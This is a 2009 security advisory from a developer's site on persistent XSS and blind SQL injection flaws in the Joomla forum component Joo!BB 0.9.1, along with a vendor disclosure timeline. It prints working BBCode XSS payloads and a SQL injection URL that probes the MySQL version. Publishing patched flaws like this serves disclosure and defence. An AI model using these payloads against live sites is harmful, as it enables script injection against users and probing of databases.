Saturday, 01 August 2009 00:00
The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.
Nested [img] XSS
[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
Nested [url] XSS
[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
BBCode [color] Tag Injection
[color=#ff0000;font-size:100px;]XSS[/color]
BBCode [url] Location XSS
[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
BBCode [font] Tag Injection
[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
BBCode [table] Tag XSS
[table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
Blind SQL Injection
/index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- 'If MySQL is version 5, this will return results. Otherwise, no results.
These vulnerabilities have been patched and users are strongly urged to update to 0.9.1 Patch 1
Timeline
- Vulnerabilities Discovered: 26 July 2009
- Vendor Notified: 27 July 2009
- Vendor Response: 29 July 2009
- Update Available: 01 August 2009
- Disclosure: 01 August 2009
Last Updated on Thursday, 30 September 2010 17:39
Add your comment
Featured Extensions
$3.00
FREE You Save: $3.00 |
$1.00
FREE You Save: $1.00 |
FREE
|
$5.00
FREE You Save: $5.00 |
Latest Articles
Most Popular
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
Cart
Your Cart is currently empty.
Keywords
Template Info
-
Name
Circles -
Creation Date
06/28/09 -
Author
Jeff Channell -
Author Email
me@jeffchannell.com -
Author URL
http://jeffchannell.com -
Version
0.0.2 -
Description
Circles